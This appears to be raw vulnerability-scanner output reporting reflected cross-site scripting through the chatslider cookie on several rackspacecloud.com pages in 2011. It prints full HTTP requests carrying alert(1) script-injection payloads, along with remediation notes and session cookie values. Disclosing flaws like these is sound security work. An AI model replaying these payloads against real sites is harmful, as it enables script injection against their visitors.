Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D10bff"%3balert(1)//1a2649babf1; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 40517
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f254c"><script>alert(1)</script>fcc008fa5fd was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_products/sites HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Df254c"><script>alert(1)</script>fcc008fa5fd; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 40585
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62e0e"><script>alert(1)</script>af147ed8d3f was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_products/sites/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D62e0e"><script>alert(1)</script>af147ed8d3f; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 40585
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3966"%3balert(1)//00978718dd5 was submitted in the chatslider cookie. This input was echoed as f3966";alert(1)//00978718dd5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_products/sites/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Df3966"%3balert(1)//00978718dd5; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 40578
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 399ee"%3balert(1)//d76664a1db3 was submitted in the chatslider cookie. This input was echoed as 399ee";alert(1)//d76664a1db3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /legal/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D399ee"%3balert(1)//d76664a1db3; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 79910
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b0b"><script>alert(1)</script>6254d0a4cbb was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /legal/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D79b0b"><script>alert(1)</script>6254d0a4cbb; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 79984
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87a2a"%3balert(1)//c2bbba18785 was submitted in the chatslider cookie. This input was echoed as 87a2a";alert(1)//c2bbba18785 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /legal/privacystatement/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D87a2a"%3balert(1)//c2bbba18785; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 50786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d196a"><script>alert(1)</script>e13dc99f94e was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /legal/privacystatement/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Dd196a"><script>alert(1)</script>e13dc99f94e; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 50842
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cb0e"%3balert(1)//d6f2b259d7 was submitted in the chatslider cookie. This input was echoed as 8cb0e";alert(1)//d6f2b259d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_cloud/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D8cb0e"%3balert(1)//d6f2b259d7; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 46011
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c56ea"><script>alert(1)</script>861c7bc264 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_cloud/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Dc56ea"><script>alert(1)</script>861c7bc264; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 46075
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22d3e"><script>alert(1)</script>f77cc20f713 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /partners/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D22d3e"><script>alert(1)</script>f77cc20f713; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 32502
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff8cc"%3balert(1)//98bc3267138 was submitted in the chatslider cookie. This input was echoed as ff8cc";alert(1)//98bc3267138 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /partners/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Dff8cc"%3balert(1)//98bc3267138; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 32468
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bcd1"%3balert(1)//123367fac7d was submitted in the chatslider cookie. This input was echoed as 8bcd1";alert(1)//123367fac7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /resellers/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D8bcd1"%3balert(1)//123367fac7d; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 34828
